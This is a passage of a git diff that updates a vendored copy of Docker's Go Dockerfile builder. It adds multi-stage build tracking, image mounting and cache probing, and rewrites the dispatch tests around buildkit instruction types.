- if err := platformSupports(strings.ToLower(cmd)); err != nil { - return err +func (r *stagesBuildResults) get(nameOrIndex string) (*container.Config, error) { + if c, ok := r.getByName(nameOrIndex); ok { + return c, nil } + ix, err := strconv.ParseInt(nameOrIndex, 10, 0) + if err != nil { + return nil, nil + } + if err := r.validateIndex(int(ix)); err != nil { + return nil, err + } + return r.flat[ix], nil +} - // The instruction itself is ONBUILD, we will make sure it follows with at - // least one argument - if upperCasedCmd == "ONBUILD" { - if ast.Next == nil { - return fmt.Errorf("ONBUILD requires at least one argument") +func (r *stagesBuildResults) checkStageNameAvailable(name string) error { + if name != "" { + if _, ok := r.getByName(name); ok { + return errors.Errorf("%s stage name already used", name) } } + return nil +} - // The instruction is part of ONBUILD trigger (not the instruction itself) - if onbuild { - switch upperCasedCmd { - case "ONBUILD": - return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") - case "MAINTAINER", "FROM": - return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd) +func (r *stagesBuildResults) commitStage(name string, config *container.Config) error { + if name != "" { + if _, ok := r.getByName(name); ok { + return errors.Errorf("%s stage name already used", name) } + r.indexed[strings.ToLower(name)] = config } + r.flat = append(r.flat, config) + return nil +} + +func commitStage(state *dispatchState, stages *stagesBuildResults) error { + return stages.commitStage(state.stageName, state.runConfig) +} + +type dispatchRequest struct { + state *dispatchState + shlex *shell.Lex + builder *Builder + source builder.Source + stages *stagesBuildResults +} + +func newDispatchRequest(builder *Builder, escapeToken rune, source builder.Source, buildArgs *BuildArgs, stages *stagesBuildResults) dispatchRequest { + return dispatchRequest{ + state: newDispatchState(buildArgs), + shlex: 
shell.NewLex(escapeToken), + builder: builder, + source: source, + stages: stages, + } +} + +func (s *dispatchState) updateRunConfig() { + s.runConfig.Image = s.imageID +} + +// hasFromImage returns true if the builder has processed a `FROM ` line +func (s *dispatchState) hasFromImage() bool { + return s.imageID != "" || (s.baseImage != nil && s.baseImage.ImageID() == "") +} - if _, ok := evaluateTable[cmd]; ok { - return nil +func (s *dispatchState) beginStage(stageName string, image builder.Image) error { + s.stageName = stageName + s.imageID = image.ImageID() + s.operatingSystem = image.OperatingSystem() + if s.operatingSystem == "" { // In case it isn't set + s.operatingSystem = runtime.GOOS + } + if !system.IsOSSupported(s.operatingSystem) { + return system.ErrNotSupportedOperatingSystem } - return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) + if image.RunConfig() != nil { + // copy avoids referencing the same instance when 2 stages have the same base + s.runConfig = copyRunConfig(image.RunConfig()) + } else { + s.runConfig = &container.Config{} + } + s.baseImage = image + s.setDefaultPath() + s.runConfig.OpenStdin = false + s.runConfig.StdinOnce = false + return nil +} + +// Add the default PATH to runConfig.ENV if one exists for the operating system and there +// is no PATH set. 
Note that Windows containers on Windows won't have one as it's set by HCS +func (s *dispatchState) setDefaultPath() { + defaultPath := system.DefaultPathEnv(s.operatingSystem) + if defaultPath == "" { + return + } + envMap := opts.ConvertKVStringsToMap(s.runConfig.Env) + if _, ok := envMap["PATH"]; !ok { + s.runConfig.Env = append(s.runConfig.Env, "PATH="+defaultPath) + } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go index 4340a2f8ac..fb79b238e8 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go @@ -1,21 +1,22 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "io/ioutil" - "strings" + "os" "testing" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) type dispatchTestCase struct { - name, dockerfile, expectedError string - files map[string]string + name, expectedError string + cmd instructions.Command + files map[string]string } func init() { @@ -23,107 +24,72 @@ func init() { } func initDispatchTestCases() []dispatchTestCase { - dispatchTestCases := []dispatchTestCase{{ - name: "copyEmptyWhitespace", - dockerfile: `COPY - quux \ - bar`, - expectedError: "COPY requires at least two arguments", - }, - { - name: "ONBUILD forbidden FROM", - dockerfile: "ONBUILD FROM scratch", - expectedError: "FROM isn't allowed as an ONBUILD trigger", - files: nil, - }, - { - name: "ONBUILD forbidden MAINTAINER", - 
dockerfile: "ONBUILD MAINTAINER docker.io", - expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger", - files: nil, - }, - { - name: "ARG two arguments", - dockerfile: "ARG foo bar", - expectedError: "ARG requires exactly one argument", - files: nil, - }, - { - name: "MAINTAINER unknown flag", - dockerfile: "MAINTAINER --boo joe@example.com", - expectedError: "Unknown flag: boo", - files: nil, - }, - { - name: "ADD multiple files to file", - dockerfile: "ADD file1.txt file2.txt test", - expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "JSON ADD multiple files to file", - dockerfile: `ADD ["file1.txt", "file2.txt", "test"]`, - expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "Wildcard ADD multiple files to file", - dockerfile: "ADD file*.txt test", + dispatchTestCases := []dispatchTestCase{ + { + name: "ADD multiple files to file", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file1.txt", + "file2.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "Wildcard JSON ADD multiple files to file", - dockerfile: `ADD ["file*.txt", "test"]`, + name: "Wildcard ADD multiple files to file", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file*.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "COPY multiple files to file", - dockerfile: "COPY file1.txt 
file2.txt test", + name: "COPY multiple files to file", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file1.txt", + "file2.txt", + "test", + }}, expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "JSON COPY multiple files to file", - dockerfile: `COPY ["file1.txt", "file2.txt", "test"]`, - expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "ADD multiple files to file with whitespace", - dockerfile: `ADD [ "test file1.txt", "test file2.txt", "test" ]`, + name: "ADD multiple files to file with whitespace", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "test file1.txt", + "test file2.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, }, { - name: "COPY multiple files to file with whitespace", - dockerfile: `COPY [ "test file1.txt", "test file2.txt", "test" ]`, + name: "COPY multiple files to file with whitespace", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "test file1.txt", + "test file2.txt", + "test", + }}, expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, }, { - name: "COPY wildcard no files", - dockerfile: `COPY file*.txt /tmp/`, - expectedError: "No source files were specified", + name: "COPY wildcard no files", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file*.txt", + "/tmp/", + }}, + expectedError: "COPY 
failed: no source files were specified", files: nil, }, { - name: "COPY url", - dockerfile: `COPY https://index.docker.io/robots.txt /`, - expectedError: "Source can't be a URL for COPY", - files: nil, - }, - { - name: "Chaining ONBUILD", - dockerfile: `ONBUILD ONBUILD RUN touch foobar`, - expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed", - files: nil, - }, - { - name: "Invalid instruction", - dockerfile: `foo bar`, - expectedError: "Unknown instruction: FOO", + name: "COPY url", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "https://index.docker.io/robots.txt", + "/", + }}, + expectedError: "source can't be a URL for COPY", files: nil, }} @@ -131,6 +97,7 @@ func initDispatchTestCases() []dispatchTestCase { } func TestDispatch(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") testCases := initDispatchTestCases() for _, testCase := range testCases { @@ -158,7 +125,7 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) { } }() - context, err := builder.MakeTarSumContext(tarStream) + context, err := remotecontext.FromArchive(tarStream) if err != nil { t.Fatalf("Error when creating tar context: %s", err) @@ -170,28 +137,8 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) { } }() - r := strings.NewReader(testCase.dockerfile) - d := parser.Directive{} - parser.SetEscapeToken(parser.DefaultEscapeToken, &d) - n, err := parser.Parse(r, &d) - - if err != nil { - t.Fatalf("Error when parsing Dockerfile: %s", err) - } - - config := &container.Config{} - options := &types.ImageBuildOptions{} - - b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context} - - err = b.dispatch(0, len(n.Children), n.Children[0]) - - if err == nil { - t.Fatalf("No error when executing test %s", testCase.name) - } - - if !strings.Contains(err.Error(), testCase.expectedError) { - t.Fatalf("Wrong error message. Should be \"%s\". 
Got \"%s\"", testCase.expectedError, err.Error()) - } - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', context, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + err = dispatch(sb, testCase.cmd) + assert.Check(t, is.ErrorContains(err, testCase.expectedError)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go deleted file mode 100644 index 28fd5b156b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build !windows - -package dockerfile - -// platformSupports is a short-term function to give users a quality error -// message if a Dockerfile uses a command not supported on the platform. -func platformSupports(command string) error { - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go deleted file mode 100644 index 72483a2ec8..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go +++ /dev/null @@ -1,13 +0,0 @@ -package dockerfile - -import "fmt" - -// platformSupports is gives users a quality error message if a Dockerfile uses -// a command not supported on the platform. 
-func platformSupports(command string) error { - switch command { - case "stopsignal": - return fmt.Errorf("The daemon on this platform does not support the command '%s'", command) - } - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go new file mode 100644 index 0000000000..53a4b9774b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go @@ -0,0 +1,121 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "runtime" + + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + dockerimage "github.com/docker/docker/image" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type getAndMountFunc func(string, bool, string) (builder.Image, builder.ROLayer, error) + +// imageSources mounts images and provides a cache for mounted images. It tracks +// all images so they can be unmounted at the end of the build. 
+type imageSources struct { + byImageID map[string]*imageMount + mounts []*imageMount + getImage getAndMountFunc +} + +func newImageSources(ctx context.Context, options builderOptions) *imageSources { + getAndMount := func(idOrRef string, localOnly bool, osForPull string) (builder.Image, builder.ROLayer, error) { + pullOption := backend.PullOptionNoPull + if !localOnly { + if options.Options.PullParent { + pullOption = backend.PullOptionForcePull + } else { + pullOption = backend.PullOptionPreferLocal + } + } + return options.Backend.GetImageAndReleasableLayer(ctx, idOrRef, backend.GetImageAndLayerOptions{ + PullOption: pullOption, + AuthConfig: options.Options.AuthConfigs, + Output: options.ProgressWriter.Output, + OS: osForPull, + }) + } + + return &imageSources{ + byImageID: make(map[string]*imageMount), + getImage: getAndMount, + } +} + +func (m *imageSources) Get(idOrRef string, localOnly bool, osForPull string) (*imageMount, error) { + if im, ok := m.byImageID[idOrRef]; ok { + return im, nil + } + + image, layer, err := m.getImage(idOrRef, localOnly, osForPull) + if err != nil { + return nil, err + } + im := newImageMount(image, layer) + m.Add(im) + return im, nil +} + +func (m *imageSources) Unmount() (retErr error) { + for _, im := range m.mounts { + if err := im.unmount(); err != nil { + logrus.Error(err) + retErr = err + } + } + return +} + +func (m *imageSources) Add(im *imageMount) { + switch im.image { + case nil: + // set the OS for scratch images + os := runtime.GOOS + // Windows does not support scratch except for LCOW + if runtime.GOOS == "windows" { + os = "linux" + } + im.image = &dockerimage.Image{V1Image: dockerimage.V1Image{OS: os}} + default: + m.byImageID[im.image.ImageID()] = im + } + m.mounts = append(m.mounts, im) +} + +// imageMount is a reference to an image that can be used as a builder.Source +type imageMount struct { + image builder.Image + source builder.Source + layer builder.ROLayer +} + +func newImageMount(image builder.Image, 
layer builder.ROLayer) *imageMount { + im := &imageMount{image: image, layer: layer} + return im +} + +func (im *imageMount) unmount() error { + if im.layer == nil { + return nil + } + if err := im.layer.Release(); err != nil { + return errors.Wrapf(err, "failed to unmount previous build image %s", im.image.ImageID()) + } + im.layer = nil + return nil +} + +func (im *imageMount) Image() builder.Image { + return im.image +} + +func (im *imageMount) NewRWLayer() (builder.RWLayer, error) { + return im.layer.NewRWLayer() +} + +func (im *imageMount) ImageID() string { + return im.image.ImageID() +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go new file mode 100644 index 0000000000..6960bf8897 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go @@ -0,0 +1,63 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/sirupsen/logrus" +) + +// ImageProber exposes an Image cache to the Builder. It supports resetting a +// cache. +type ImageProber interface { + Reset() + Probe(parentID string, runConfig *container.Config) (string, error) +} + +type imageProber struct { + cache builder.ImageCache + reset func() builder.ImageCache + cacheBusted bool +} + +func newImageProber(cacheBuilder builder.ImageCacheBuilder, cacheFrom []string, noCache bool) ImageProber { + if noCache { + return &nopProber{} + } + + reset := func() builder.ImageCache { + return cacheBuilder.MakeImageCache(cacheFrom) + } + return &imageProber{cache: reset(), reset: reset} +} + +func (c *imageProber) Reset() { + c.cache = c.reset() + c.cacheBusted = false +} + +// Probe checks if cache match can be found for current build instruction. 
+// It returns the cachedID if there is a hit, and the empty string on miss +func (c *imageProber) Probe(parentID string, runConfig *container.Config) (string, error) { + if c.cacheBusted { + return "", nil + } + cacheID, err := c.cache.GetCache(parentID, runConfig) + if err != nil { + return "", err + } + if len(cacheID) == 0 { + logrus.Debugf("[BUILDER] Cache miss: %s", runConfig.Cmd) + c.cacheBusted = true + return "", nil + } + logrus.Debugf("[BUILDER] Use cached version: %s", runConfig.Cmd) + return cacheID, nil +} + +type nopProber struct{} + +func (c *nopProber) Reset() {} + +func (c *nopProber) Probe(_ string, _ *container.Config) (string, error) { + return "", nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go index 6f0a367842..88e75a2179 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" // internals for handling commands. Covers many areas and a lot of // non-contiguous functionality. Please read the comments. 
@@ -6,664 +6,476 @@ package dockerfile import ( "crypto/sha256" "encoding/hex" - "errors" "fmt" "io" - "io/ioutil" - "net/http" - "net/url" "os" + "path" "path/filepath" - "sort" + "runtime" "strings" - "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/image" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/pkg/tarsum" - "github.com/docker/docker/pkg/urlutil" - "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error { - if b.disableCommit { - return nil - } - if b.image == "" && !b.noBaseImage { - return fmt.Errorf("Please provide a source image with `from` prior to commit") - } - b.runConfig.Image = b.image - - if id == "" { - cmd := b.runConfig.Cmd - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment)) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - - hit, err := b.probeCache() - if err != nil { - return err - } else if hit { - return nil - } - id, err = b.create() - if err != nil { - return err - } - } - - // Note: Actually copy the struct - autoConfig := *b.runConfig - autoConfig.Cmd = autoCmd - - commitCfg := 
&backend.ContainerCommitConfig{ - ContainerCommitConfig: types.ContainerCommitConfig{ - Author: b.maintainer, - Pause: true, - Config: &autoConfig, - }, - } - - // Commit the container - imageID, err := b.docker.Commit(id, commitCfg) - if err != nil { - return err - } - - b.image = imageID - return nil +// Archiver defines an interface for copying files from one destination to +// another using Tar/Untar. +type Archiver interface { + TarUntar(src, dst string) error + UntarPath(src, dst string) error + CopyWithTar(src, dst string) error + CopyFileWithTar(src, dst string) error + IDMappings() *idtools.IDMappings } -type copyInfo struct { - builder.FileInfo - decompress bool +// The builder will use the following interfaces if the container fs implements +// these for optimized copies to and from the container. +type extractor interface { + ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error } -func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error { - if b.context == nil { - return fmt.Errorf("No context given. Impossible to use %s", cmdName) - } - - if len(args) < 2 { - return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName) - } - - // Work in daemon-specific filepath semantics - dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest - - b.runConfig.Image = b.image - - var infos []copyInfo - - // Loop through each src file and calculate the info we need to - // do the copy (e.g. hash value if cached). 
Don't actually do - // the copy until we've looked at all src files - var err error - for _, orig := range args[0 : len(args)-1] { - var fi builder.FileInfo - decompress := allowLocalDecompression - if urlutil.IsURL(orig) { - if !allowRemote { - return fmt.Errorf("Source can't be a URL for %s", cmdName) - } - fi, err = b.download(orig) - if err != nil { - return err - } - defer os.RemoveAll(filepath.Dir(fi.Path())) - decompress = false - infos = append(infos, copyInfo{fi, decompress}) - continue - } - // not a URL - subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true) - if err != nil { - return err - } +type archiver interface { + ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) +} - infos = append(infos, subInfos...) +// helper functions to get tar/untar func +func untarFunc(i interface{}) containerfs.UntarFunc { + if ea, ok := i.(extractor); ok { + return ea.ExtractArchive } + return chrootarchive.Untar +} - if len(infos) == 0 { - return fmt.Errorf("No source files were specified") +func tarFunc(i interface{}) containerfs.TarFunc { + if ap, ok := i.(archiver); ok { + return ap.ArchivePath } - if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) { - return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) - } - - // For backwards compat, if there's just one info then use it as the - // cache look-up string, otherwise hash 'em all into one - var srcHash string - var origPaths string + return archive.TarWithOptions +} - if len(infos) == 1 { - fi := infos[0].FileInfo - origPaths = fi.Name() - if hfi, ok := fi.(builder.Hashed); ok { - srcHash = hfi.Hash() - } - } else { - var hashs []string - var origs []string - for _, info := range infos { - fi := info.FileInfo - origs = append(origs, fi.Name()) - if hfi, ok := fi.(builder.Hashed); ok { - hashs = append(hashs, hfi.Hash()) - } - } - hasher := sha256.New() - 
hasher.Write([]byte(strings.Join(hashs, ","))) - srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil)) - origPaths = strings.Join(origs, " ") +func (b *Builder) getArchiver(src, dst containerfs.Driver) Archiver { + t, u := tarFunc(src), untarFunc(dst) + return &containerfs.Archiver{ + SrcDriver: src, + DstDriver: dst, + Tar: t, + Untar: u, + IDMappingsVar: b.idMappings, } +} - cmd := b.runConfig.Cmd - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest))) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - - if hit, err := b.probeCache(); err != nil { - return err - } else if hit { +func (b *Builder) commit(dispatchState *dispatchState, comment string) error { + if b.disableCommit { return nil } - - container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) - if err != nil { - return err + if !dispatchState.hasFromImage() { + return errors.New("Please provide a source image with `from` prior to commit") } - b.tmpContainers[container.ID] = struct{}{} - comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest) - - // Twiddle the destination when its a relative path - meaning, make it - // relative to the WORKINGDIR - if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil { + runConfigWithCommentCmd := copyRunConfig(dispatchState.runConfig, withCmdComment(comment, dispatchState.operatingSystem)) + id, err := b.probeAndCreate(dispatchState, runConfigWithCommentCmd) + if err != nil || id == "" { return err } - for _, info := range infos { - if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil { - return err - } - } - - return b.commit(container.ID, cmd, comment) + return b.commitContainer(dispatchState, id, runConfigWithCommentCmd) } -func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) { - // get filename from URL - u, err := url.Parse(srcURL) - if err 
!= nil { - return - } - path := filepath.FromSlash(u.Path) // Ensure in platform semantics - if strings.HasSuffix(path, string(os.PathSeparator)) { - path = path[:len(path)-1] - } - parts := strings.Split(path, string(os.PathSeparator)) - filename := parts[len(parts)-1] - if filename == "" { - err = fmt.Errorf("cannot determine filename from url: %s", u) - return +func (b *Builder) commitContainer(dispatchState *dispatchState, id string, containerConfig *container.Config) error { + if b.disableCommit { + return nil } - // Initiate the download - resp, err := httputils.Download(srcURL) - if err != nil { - return + commitCfg := backend.CommitConfig{ + Author: dispatchState.maintainer, + // TODO: this copy should be done by Commit() + Config: copyRunConfig(dispatchState.runConfig), + ContainerConfig: containerConfig, + ContainerID: id, } - // Prepare file in a tmp dir - tmpDir, err := ioutils.TempDir("", "docker-remote") - if err != nil { - return - } - defer func() { - if err != nil { - os.RemoveAll(tmpDir) - } - }() - tmpFileName := filepath.Join(tmpDir, filename) - tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) - if err != nil { - return - } + imageID, err := b.docker.CommitBuildStep(commitCfg) + dispatchState.imageID = string(imageID) + return err +} - stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter) - progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true) - progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") - // Download and dump result to tmp file - if _, err = io.Copy(tmpFile, progressReader); err != nil { - tmpFile.Close() - return - } - fmt.Fprintln(b.Stdout) - // ignoring error because the file was already opened successfully - tmpFileSt, err := tmpFile.Stat() +func (b *Builder) exportImage(state *dispatchState, layer builder.RWLayer, parent builder.Image, runConfig *container.Config) error { + newLayer, err := 
layer.Commit() if err != nil { - tmpFile.Close() - return + return err } - // Set the mtime to the Last-Modified header value if present - // Otherwise just remove atime and mtime - mTime := time.Time{} + // add an image mount without an image so the layer is properly unmounted + // if there is an error before we can add the full mount with image + b.imageSources.Add(newImageMount(nil, newLayer)) - lastMod := resp.Header.Get("Last-Modified") - if lastMod != "" { - // If we can't parse it then just let it default to 'zero' - // otherwise use the parsed time value - if parsedMTime, err := http.ParseTime(lastMod); err == nil { - mTime = parsedMTime - } + parentImage, ok := parent.(*image.Image) + if !ok { + return errors.Errorf("unexpected image type") } - tmpFile.Close() + newImage := image.NewChildImage(parentImage, image.ChildConfig{ + Author: state.maintainer, + ContainerConfig: runConfig, + DiffID: newLayer.DiffID(), + Config: copyRunConfig(state.runConfig), + }, parentImage.OS) - if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil { - return - } - - // Calc the checksum, even if we're using the cache - r, err := archive.Tar(tmpFileName, archive.Uncompressed) + // TODO: it seems strange to marshal this here instead of just passing in the + // image struct + config, err := newImage.MarshalJSON() if err != nil { - return + return errors.Wrap(err, "failed to encode image config") } - tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1) + + exportedImage, err := b.docker.CreateImage(config, state.imageID) if err != nil { - return + return errors.Wrapf(err, "failed to export image") } - if _, err = io.Copy(ioutil.Discard, tarSum); err != nil { - return - } - hash := tarSum.Sum(nil) - r.Close() - return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil -} -func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) { + 
state.imageID = exportedImage.ImageID() + b.imageSources.Add(newImageMount(exportedImage, newLayer)) + return nil +} - // Work in daemon-specific OS filepath semantics - origPath = filepath.FromSlash(origPath) +func (b *Builder) performCopy(state *dispatchState, inst copyInstruction) error { + srcHash := getSourceHashFromInfos(inst.infos) - if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 { - origPath = origPath[1:] + var chownComment string + if inst.chownStr != "" { + chownComment = fmt.Sprintf("--chown=%s", inst.chownStr) } - origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator)) - - // Deal with wildcards - if allowWildcards && containsWildcards(origPath) { - var copyInfos []copyInfo - if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error { - if err != nil { - return err - } - if info.Name() == "" { - // Why are we doing this check? - return nil - } - if match, _ := filepath.Match(origPath, path); !match { - return nil - } + commentStr := fmt.Sprintf("%s %s%s in %s ", inst.cmdName, chownComment, srcHash, inst.dest) - // Note we set allowWildcards to false in case the name has - // a * in it - subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false) - if err != nil { - return err - } - copyInfos = append(copyInfos, subInfos...) - return nil - }); err != nil { - return nil, err - } - return copyInfos, nil + // TODO: should this have been using origPaths instead of srcHash in the comment? 
+ runConfigWithCommentCmd := copyRunConfig( + state.runConfig, + withCmdCommentString(commentStr, state.operatingSystem)) + hit, err := b.probeCache(state, runConfigWithCommentCmd) + if err != nil || hit { + return err } - // Must be a dir or a file - - statPath, fi, err := b.context.Stat(origPath) + imageMount, err := b.imageSources.Get(state.imageID, true, state.operatingSystem) if err != nil { - return nil, err + return errors.Wrapf(err, "failed to get destination image %q", state.imageID) } - copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}} - - hfi, handleHash := fi.(builder.Hashed) - if !handleHash { - return copyInfos, nil + rwLayer, err := imageMount.NewRWLayer() + if err != nil { + return err } + defer rwLayer.Release() - // Deal with the single file case - if !fi.IsDir() { - hfi.SetHash("file:" + hfi.Hash()) - return copyInfos, nil - } - // Must be a dir - var subfiles []string - err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error { - if err != nil { - return err - } - // we already checked handleHash above - subfiles = append(subfiles, info.(builder.Hashed).Hash()) - return nil - }) + destInfo, err := createDestInfo(state.runConfig.WorkingDir, inst, rwLayer, state.operatingSystem) if err != nil { - return nil, err + return err } - sort.Strings(subfiles) - hasher := sha256.New() - hasher.Write([]byte(strings.Join(subfiles, ","))) - hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil))) - - return copyInfos, nil -} - -func (b *Builder) processImageFrom(img builder.Image) error { - if img != nil { - b.image = img.ImageID() - - if img.RunConfig() != nil { - b.runConfig = img.RunConfig() + chownPair := b.idMappings.RootPair() + // if a chown was requested, perform the steps to get the uid, gid + // translated (if necessary because of user namespaces), and replace + // the root pair with the chown pair for copy operations + if inst.chownStr != "" { + chownPair, err = 
